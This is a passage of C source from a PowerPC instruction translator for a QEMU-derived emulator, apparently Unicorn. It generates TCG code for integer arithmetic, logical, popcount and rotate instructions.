(unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulhdu mulhdu. */ static void gen_mulhdu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv lo = tcg_temp_new(tcg_ctx); tcg_gen_mulu2_tl(tcg_ctx, lo, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, lo); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulld mulld. */ static void gen_mulld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mul_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulldo mulldo. */ static void gen_mulldo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_muls2_i64(tcg_ctx, t0, t1, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_mov_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_gen_sari_i64(tcg_ctx, t0, t0, 63); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, cpu_ov, t0, t1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, cpu_ov); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } #endif /* Common subf function */ static inline void gen_op_arith_subf(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, bool add_ca, bool compute_ca, bool compute_ov, bool compute_rc0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = ret; if (compute_ca || compute_ov) { t0 = tcg_temp_new(tcg_ctx); } if (compute_ca) { /* dest = ~arg1 + arg2 [+ ca]. */ if (NARROW_MODE(ctx)) { /* * Caution: a non-obvious corner case of the spec is that * we must produce the *entire* 64-bit addition, but * produce the carry into bit 32. */ TCGv inv1 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_not_tl(tcg_ctx, inv1, arg1); if (add_ca) { tcg_gen_add_tl(tcg_ctx, t0, arg2, cpu_ca); } else { tcg_gen_addi_tl(tcg_ctx, t0, arg2, 1); } tcg_gen_xor_tl(tcg_ctx, t1, arg2, inv1); /* add without carry */ tcg_gen_add_tl(tcg_ctx, t0, t0, inv1); tcg_temp_free(tcg_ctx, inv1); tcg_gen_xor_tl(tcg_ctx, cpu_ca, t0, t1); /* bits changes w/ carry */ tcg_temp_free(tcg_ctx, t1); tcg_gen_extract_tl(tcg_ctx, cpu_ca, cpu_ca, 32, 1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ca32, cpu_ca); } } else if (add_ca) { TCGv zero, inv1 = tcg_temp_new(tcg_ctx); tcg_gen_not_tl(tcg_ctx, inv1, arg1); zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_add2_tl(tcg_ctx, t0, cpu_ca, arg2, zero, cpu_ca, zero); tcg_gen_add2_tl(tcg_ctx, t0, cpu_ca, t0, cpu_ca, inv1, zero); gen_op_arith_compute_ca32(ctx, t0, inv1, arg2, cpu_ca32, 0); tcg_temp_free(tcg_ctx, zero); tcg_temp_free(tcg_ctx, inv1); } else { tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, cpu_ca, arg2, arg1); tcg_gen_sub_tl(tcg_ctx, t0, arg2, arg1); gen_op_arith_compute_ca32(ctx, t0, arg1, arg2, cpu_ca32, 1); } } else if (add_ca) { /* * Since we're ignoring carry-out, we can simplify the * standard ~arg1 + arg2 + ca to arg2 - arg1 + ca - 1. */ tcg_gen_sub_tl(tcg_ctx, t0, arg2, arg1); tcg_gen_add_tl(tcg_ctx, t0, t0, cpu_ca); tcg_gen_subi_tl(tcg_ctx, t0, t0, 1); } else { tcg_gen_sub_tl(tcg_ctx, t0, arg2, arg1); } if (compute_ov) { gen_op_arith_compute_ov(ctx, t0, arg1, arg2, 1); } if (unlikely(compute_rc0)) { gen_set_Rc0(ctx, t0); } if (t0 != ret) { tcg_gen_mov_tl(tcg_ctx, ret, t0); tcg_temp_free(tcg_ctx, t0); } } /* Sub functions with Two operands functions */ #define GEN_INT_ARITH_SUBF(name, opc3, add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ } /* Sub functions with one operand and one immediate */ #define GEN_INT_ARITH_SUBF_CONST(name, opc3, const_val, \ add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv t0 = tcg_const_tl(tcg_ctx, const_val); \ gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], t0, \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ tcg_temp_free(tcg_ctx, t0); \ } /* subf subf. subfo subfo. */ GEN_INT_ARITH_SUBF(subf, 0x01, 0, 0, 0) GEN_INT_ARITH_SUBF(subfo, 0x11, 0, 0, 1) /* subfc subfc. subfco subfco. */ GEN_INT_ARITH_SUBF(subfc, 0x00, 0, 1, 0) GEN_INT_ARITH_SUBF(subfco, 0x10, 0, 1, 1) /* subfe subfe. subfeo subfo. */ GEN_INT_ARITH_SUBF(subfe, 0x04, 1, 1, 0) GEN_INT_ARITH_SUBF(subfeo, 0x14, 1, 1, 1) /* subfme subfme. subfmeo subfmeo. */ GEN_INT_ARITH_SUBF_CONST(subfme, 0x07, -1LL, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfmeo, 0x17, -1LL, 1, 1, 1) /* subfze subfze. subfzeo subfzeo.*/ GEN_INT_ARITH_SUBF_CONST(subfze, 0x06, 0, 1, 1, 0) GEN_INT_ARITH_SUBF_CONST(subfzeo, 0x16, 0, 1, 1, 1) /* subfic */ static void gen_subfic(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv c = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], c, 0, 1, 0, 0); tcg_temp_free(tcg_ctx, c); } /* neg neg. nego nego. */ static inline void gen_op_arith_neg(DisasContext *ctx, bool compute_ov) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv zero = tcg_const_tl(tcg_ctx, 0); gen_op_arith_subf(ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], zero, 0, 0, compute_ov, Rc(ctx->opcode)); tcg_temp_free(tcg_ctx, zero); } static void gen_neg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_neg_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); if (unlikely(Rc(ctx->opcode))) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } static void gen_nego(DisasContext *ctx) { gen_op_arith_neg(ctx, 1); } /*** Integer logical ***/ #define GEN_LOGICAL2(name, tcg_op, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_op(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], \ cpu_gpr[rB(ctx->opcode)]); \ if (unlikely(Rc(ctx->opcode) != 0)) \ gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); \ } #define GEN_LOGICAL1(name, tcg_op, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_op(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); \ if (unlikely(Rc(ctx->opcode) != 0)) \ gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); \ } /* and & and. */ GEN_LOGICAL2(and, tcg_gen_and_tl, 0x00, PPC_INTEGER); /* andc & andc. */ GEN_LOGICAL2(andc, tcg_gen_andc_tl, 0x01, PPC_INTEGER); /* andi. */ static void gen_andi_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], UIMM(ctx->opcode)); gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } /* andis. */ static void gen_andis_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], UIMM(ctx->opcode) << 16); gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } /* cntlzw */ static void gen_cntlzw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t, cpu_gpr[rS(ctx->opcode)]); tcg_gen_clzi_i32(tcg_ctx, t, t, 32); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t); tcg_temp_free_i32(tcg_ctx, t); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* cnttzw */ static void gen_cnttzw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t, cpu_gpr[rS(ctx->opcode)]); tcg_gen_ctzi_i32(tcg_ctx, t, t, 32); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t); tcg_temp_free_i32(tcg_ctx, t); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* eqv & eqv. */ GEN_LOGICAL2(eqv, tcg_gen_eqv_tl, 0x08, PPC_INTEGER); /* extsb & extsb. */ GEN_LOGICAL1(extsb, tcg_gen_ext8s_tl, 0x1D, PPC_INTEGER); /* extsh & extsh. */ GEN_LOGICAL1(extsh, tcg_gen_ext16s_tl, 0x1C, PPC_INTEGER); /* nand & nand. */ GEN_LOGICAL2(nand, tcg_gen_nand_tl, 0x0E, PPC_INTEGER); /* nor & nor. */ GEN_LOGICAL2(nor, tcg_gen_nor_tl, 0x03, PPC_INTEGER); #if defined(TARGET_PPC64) static void gen_pause(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, 0); #ifdef _MSC_VER tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, 0 - offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #else tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, -offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #endif tcg_temp_free_i32(tcg_ctx, t0); /* Stop translation, this gives other CPUs a chance to run */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } #endif /* defined(TARGET_PPC64) */ /* or & or. */ static void gen_or(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, ra, rb; rs = rS(ctx->opcode); ra = rA(ctx->opcode); rb = rB(ctx->opcode); /* Optimisation for mr. ri case */ if (rs != ra || rs != rb) { if (rs != rb) { tcg_gen_or_tl(tcg_ctx, cpu_gpr[ra], cpu_gpr[rs], cpu_gpr[rb]); } else { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], cpu_gpr[rs]); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[ra]); } } else if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rs]); #if defined(TARGET_PPC64) } else if (rs != 0) { /* 0 is nop */ int prio = 0; switch (rs) { case 1: /* Set process priority to low */ prio = 2; break; case 6: /* Set process priority to medium-low */ prio = 3; break; case 2: /* Set process priority to normal */ prio = 4; break; case 31: if (!ctx->pr) { /* Set process priority to very low */ prio = 1; } break; case 5: if (!ctx->pr) { /* Set process priority to medium-hight */ prio = 5; } break; case 3: if (!ctx->pr) { /* Set process priority to high */ prio = 6; } break; case 7: if (ctx->hv && !ctx->pr) { /* Set process priority to very high */ prio = 7; } break; default: break; } if (prio) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, SPR_PPR); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x001C000000000000ULL); tcg_gen_ori_tl(tcg_ctx, t0, t0, ((uint64_t)prio) << 50); gen_store_spr(tcg_ctx, SPR_PPR, t0); tcg_temp_free(tcg_ctx, t0); } /* * Pause out of TCG otherwise spin loops with smt_low eat too * much CPU and the kernel hangs. This applies to all * encodings other than no-op, e.g., miso(rs=26), yield(27), * mdoio(29), mdoom(30), and all currently undefined. */ gen_pause(ctx); #endif } } /* orc & orc. */ GEN_LOGICAL2(orc, tcg_gen_orc_tl, 0x0C, PPC_INTEGER); /* xor & xor. */ static void gen_xor(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Optimisation for "set to zero" case */ if (rS(ctx->opcode) != rB(ctx->opcode)) { tcg_gen_xor_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } else { tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], 0); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* ori */ static void gen_ori(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm); } /* oris */ static void gen_oris(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { /* NOP */ return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm << 16); } /* xori */ static void gen_xori(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { /* NOP */ return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm); } /* xoris */ static void gen_xoris(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = UIMM(ctx->opcode); if (rS(ctx->opcode) == rA(ctx->opcode) && uimm == 0) { /* NOP */ return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], uimm << 16); } /* popcntb : PowerPC 2.03 specification */ static void gen_popcntb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_popcntb(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); } static void gen_popcntw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #if defined(TARGET_PPC64) gen_helper_popcntw(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); #else tcg_gen_ctpop_i32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); #endif } #if defined(TARGET_PPC64) /* popcntd: PowerPC 2.06 specification */ static void gen_popcntd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ctpop_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); } #endif /* prtyw: PowerPC 2.05 specification */ static void gen_prtyw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv ra = cpu_gpr[rA(ctx->opcode)]; TCGv rs = cpu_gpr[rS(ctx->opcode)]; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, rs, 16); tcg_gen_xor_tl(tcg_ctx, ra, rs, t0); tcg_gen_shri_tl(tcg_ctx, t0, ra, 8); tcg_gen_xor_tl(tcg_ctx, ra, ra, t0); tcg_gen_andi_tl(tcg_ctx, ra, ra, (target_ulong)0x100000001ULL); tcg_temp_free(tcg_ctx, t0); } #if defined(TARGET_PPC64) /* prtyd: PowerPC 2.05 specification */ static void gen_prtyd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv ra = cpu_gpr[rA(ctx->opcode)]; TCGv rs = cpu_gpr[rS(ctx->opcode)]; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, rs, 32); tcg_gen_xor_tl(tcg_ctx, ra, rs, t0); tcg_gen_shri_tl(tcg_ctx, t0, ra, 16); tcg_gen_xor_tl(tcg_ctx, ra, ra, t0); tcg_gen_shri_tl(tcg_ctx, t0, ra, 8); tcg_gen_xor_tl(tcg_ctx, ra, ra, t0); tcg_gen_andi_tl(tcg_ctx, ra, ra, 1); tcg_temp_free(tcg_ctx, t0); } #endif #if defined(TARGET_PPC64) /* bpermd */ static void gen_bpermd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_bpermd(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } #endif #if defined(TARGET_PPC64) /* extsw & extsw. */ GEN_LOGICAL1(extsw, tcg_gen_ext32s_tl, 0x1E, PPC_64B); /* cntlzd */ static void gen_cntlzd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_clzi_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], 64); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* cnttzd */ static void gen_cnttzd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ctzi_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], 64); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* darn */ static void gen_darn(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int l = L(ctx->opcode); if (l > 2) { tcg_gen_movi_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], -1); } else { if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } if (l == 0) { gen_helper_darn32(tcg_ctx, cpu_gpr[rD(ctx->opcode)]); } else { /* Return 64-bit random for both CRN and RRN */ gen_helper_darn64(tcg_ctx, cpu_gpr[rD(ctx->opcode)]); } if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_stop_exception(ctx); } } } #endif /*** Integer rotate ***/ /* rlwimi & rlwimi. */ static void gen_rlwimi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; uint32_t sh = SH(ctx->opcode); uint32_t mb = MB(ctx->opcode); uint32_t me = ME(ctx->opcode); if (sh == (31 - me) && mb <= me) { tcg_gen_deposit_tl(tcg_ctx, t_ra, t_ra, t_rs, sh, me - mb + 1); } else { target_ulong mask; TCGv t1; #if defined(TARGET_PPC64) mb += 32; me += 32; #endif mask = MASK(mb, me); t1 = tcg_temp_new(tcg_ctx); if (mask <= 0xffffffffu) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, t_rs); tcg_gen_rotli_i32(tcg_ctx, t0, t0, sh); tcg_gen_extu_i32_tl(tcg_ctx, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else { #if defined(TARGET_PPC64) tcg_gen_deposit_i64(tcg_ctx, t1, t_rs, t_rs, 32, 32); tcg_gen_rotli_i64(tcg_ctx, t1, t1, sh); #else g_assert_not_reached(); #endif } tcg_gen_andi_tl(tcg_ctx, t1, t1, mask); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, ~mask); tcg_gen_or_tl(tcg_ctx, t_ra, t_ra, t1); tcg_temp_free(tcg_ctx, t1); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rlwinm & rlwinm. */ static void gen_rlwinm(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; int sh = SH(ctx->opcode); int mb = MB(ctx->opcode); int me = ME(ctx->opcode); int len = me - mb + 1; int rsh = (32 - sh) & 31; if (sh != 0 && len > 0 && me == (31 - sh)) { tcg_gen_deposit_z_tl(tcg_ctx, t_ra, t_rs, sh, len); } else if (me == 31 && rsh + len <= 32) { tcg_gen_extract_tl(tcg_ctx, t_ra, t_rs, rsh, len); } else { target_ulong mask; #if defined(TARGET_PPC64) mb += 32; me += 32; #endif mask = MASK(mb, me); if (mask <= 0xffffffffu) { if (sh == 0) { tcg_gen_andi_tl(tcg_ctx, t_ra, t_rs, mask); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, t_rs); tcg_gen_rotli_i32(tcg_ctx, t0, t0, sh); tcg_gen_andi_i32(tcg_ctx, t0, t0, mask); tcg_gen_extu_i32_tl(tcg_ctx, t_ra, t0); tcg_temp_free_i32(tcg_ctx, t0); } } else { #if defined(TARGET_PPC64) tcg_gen_deposit_i64(tcg_ctx, t_ra, t_rs, t_rs, 32, 32); tcg_gen_rotli_i64(tcg_ctx, t_ra, t_ra, sh); tcg_gen_andi_i64(tcg_ctx, t_ra, t_ra, mask); #else g_assert_not_reached(); #endif } } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rlwnm & rlwnm. */ static void gen_rlwnm(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; TCGv t_rb = cpu_gpr[rB(ctx->opcode)]; uint32_t mb = MB(ctx->opcode); uint32_t me = ME(ctx->opcode); target_ulong mask; #if defined(TARGET_PPC64) mb += 32; me += 32; #endif mask = MASK(mb, me); if (mask <= 0xffffffffu) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, t_rb); tcg_gen_trunc_tl_i32(tcg_ctx, t1, t_rs); tcg_gen_andi_i32(tcg_ctx, t0, t0, 0x1f); tcg_gen_rotl_i32(tcg_ctx, t1, t1, t0); tcg_gen_extu_i32_tl(tcg_ctx, t_ra, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } else { #if defined(TARGET_PPC64) TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, t_rb, 0x1f); tcg_gen_deposit_i64(tcg_ctx, t_ra, t_rs, t_rs, 32, 32); tcg_gen_rotl_i64(tcg_ctx, t_ra, t_ra, t0); tcg_temp_free_i64(tcg_ctx, t0); #else g_assert_not_reached(); #endif } tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, mask); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } #if defined(TARGET_PPC64) #define GEN_PPC64_R2(name, opc1, opc2) \ static void glue(gen_, name##0)(DisasContext *ctx) \ { \ gen_##name(ctx, 0); \ } \ \ static void glue(gen_, name##1)(DisasContext *ctx) \ { \ gen_##name(ctx, 1); \ } #define GEN_PPC64_R4(name, opc1, opc2) \ static void glue(gen_, name##0)(DisasContext *ctx) \ { \ gen_##name(ctx, 0, 0); \ } \ \ static void glue(gen_, name##1)(DisasContext *ctx) \ { \ gen_##name(ctx, 0, 1); \ } \ \ static void glue(gen_, name##2)(DisasContext *ctx) \ { \ gen_##name(ctx, 1, 0); \ } \ \ static void glue(gen_, name##3)(DisasContext *ctx) \ { \ gen_##name(ctx, 1, 1); \ } static void gen_rldinm(DisasContext *ctx, int mb, int me, int sh) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; int len = me - mb + 1; int rsh = (64 - sh) & 63; if (sh != 0 && len > 0 && me == (63 - sh)) { tcg_gen_deposit_z_tl(tcg_ctx, t_ra, t_rs, sh, len); } else if (me == 63 && rsh + len <= 64) { tcg_gen_extract_tl(tcg_ctx, t_ra, t_rs, rsh, len); } else { tcg_gen_rotli_tl(tcg_ctx, t_ra, t_rs, sh); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, MASK(mb, me)); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rldicl - rldicl. */ static inline void gen_rldicl(DisasContext *ctx, int mbn, int shn) { uint32_t sh, mb; sh = SH(ctx->opcode) | (shn << 5); mb = MB(ctx->opcode) | (mbn << 5); gen_rldinm(ctx, mb, 63, sh); } GEN_PPC64_R4(rldicl, 0x1E, 0x00); /* rldicr - rldicr. */ static inline void gen_rldicr(DisasContext *ctx, int men, int shn) { uint32_t sh, me; sh = SH(ctx->opcode) | (shn << 5); me = MB(ctx->opcode) | (men << 5); gen_rldinm(ctx, 0, me, sh); } GEN_PPC64_R4(rldicr, 0x1E, 0x02); /* rldic - rldic. */ static inline void gen_rldic(DisasContext *ctx, int mbn, int shn) { uint32_t sh, mb; sh = SH(ctx->opcode) | (shn << 5); mb = MB(ctx->opcode) | (mbn << 5); gen_rldinm(ctx, mb, 63 - sh, sh); } GEN_PPC64_R4(rldic, 0x1E, 0x04); static void gen_rldnm(DisasContext *ctx, int mb, int me) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; TCGv t_rb = cpu_gpr[rB(ctx->opcode)]; TCGv t0; t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, t_rb, 0x3f); tcg_gen_rotl_tl(tcg_ctx, t_ra, t_rs, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, MASK(mb, me)); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t_ra); } } /* rldcl - rldcl. */ static inline void gen_rldcl(DisasContext *ctx, int mbn) { uint32_t mb; mb = MB(ctx->opcode) | (mbn << 5); gen_rldnm(ctx, mb, 63); } GEN_PPC64_R2(rldcl, 0x1E, 0x08); /* rldcr - rldcr. */ static inline void gen_rldcr(DisasContext *ctx, int men) { uint32_t me; me = MB(ctx->opcode) | (men << 5); gen_rldnm(ctx, 0, me); } GEN_PPC64_R2(rldcr, 0x1E, 0x09); /* rldimi - rldimi. */ static void gen_rldimi(DisasContext *ctx, int mbn, int shn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t_ra = cpu_gpr[rA(ctx->opcode)]; TCGv t_rs = cpu_gpr[rS(ctx->opcode)]; uint32_t sh = SH(ctx->opcode) | (shn << 5); uint32_t mb = MB(ctx->opcode) | (mbn << 5); uint32_t me = 63 - sh; if (mb <= me) { tcg_gen_deposit_tl(tcg_ctx, t_ra, t_ra, t_rs, sh, me - mb + 1); } else { target_ulong mask = MASK(mb, me); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_rotli_tl(tcg_ctx, t1, t_rs, sh); tcg_gen_andi_tl(tcg_ctx, t1, t1, mask); tcg_gen_andi_tl(tcg_ctx, t_ra, t_ra, ~mask); tcg_gen_or_tl(tcg_ctx, t_ra, t_ra, t1); tcg_temp_free(tcg_ctx, t1); } if (unlikely(Rc(ctx->opcode) != 0)) { 